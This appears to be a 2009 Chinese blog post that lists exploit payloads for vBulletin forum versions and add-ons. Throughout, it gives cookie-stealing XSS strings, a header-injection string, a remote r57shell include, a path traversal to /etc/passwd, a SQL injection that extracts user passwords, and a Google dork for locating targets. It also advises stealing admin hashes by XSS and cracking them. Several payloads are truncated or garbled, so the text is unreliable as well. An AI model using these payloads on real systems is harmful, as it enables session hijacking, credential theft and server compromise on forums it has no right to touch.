分类: 网络与安全
2009-01-11 17:00:25
2.*.* - XSS
Quote:[E*MAIL]aaa@aaa.aa"'s='[/E*MAIL]' sss="i=new Image(); i.src=''+document.cookie;this.sss=null" style=top:expression(eval(this.sss));
vBulletin 3.0
混世魔王:收集:vBulletin 的注入很少,国外对付VBB的办法是XSS到admin 的hash,然后用vBulletin Hash cracker2.0 破解.
3.0.0 - XSS
Quote: ... wposts=0&query=
3.0-3.0.4
Quote:[]=1&f=2&comma=".system
3.0.3–3.0.9 XSS
Quote:
3.0.9 and 3.5.4 - XSS
Quote: ... ect=1234&WYSIWY G_HTML=%3Cp%3E%3C%2Fp%3E&s=&f=3&do=postthread&post hash=c8d3fe38b082b6d3381cbee17f1f1aca&poststarttim e='%2Bimg = new Image(); img.src = ""+document.cookie;%2B'&sbutton=%D1%EE%E7%E4% E0%F2%FC+%ED%EE%E2%F3%FE+%F2% E5%EC%F3&parseurl=1&disablesmilies=1&emailupdate=3 &postpoll=yes&polloptions=1234&openclose=1&stickun stick=
1&iconid=0
vBulletin 3.5
Quote:TITLE:--------->Test
BODY:---------->Obojętnie
OTHER OPTIONS:->Obojętnie
3.5.3 - XSS
Quote:
pass:Twoje hasło
email: .nomatt'>"+document.cookie;.nomatt
Note About lenght limitation
****
forum/profile.php?do=editoptions
Receive Email from Other Members=yes
****
{your id}
3.5.4
Quote:
3.5.4 - XSS
Quote: ... l=lala2%0d%0aConten t-Length:%2033%0d%0a%0d%0aHacked!%0d%0a%0d%0a
Moduły do vbulletin
vBug Tracker 3.5.1 - XSS
Quote: ... ug_typeid=0&vbu g_statusid=0&vbug_severityid=0&vbug_versionid=0&as signment=0&sortfield=lastedit&sortorder=%22%3Cscri pt%3Eimg= new Image(); img.src = ""+document.cookie;%3C/script%3E
ImpEx 1.74
Quote: ... wnload/r57shell.txt
... ../../../etc/passwd
ibProArcade 2.x - SQL injection
Quote: ... =report&user=-1 union select password from user where userid=[any_user]
google dork:
Code:
"Powered by vBulletin Version [numer_version]"
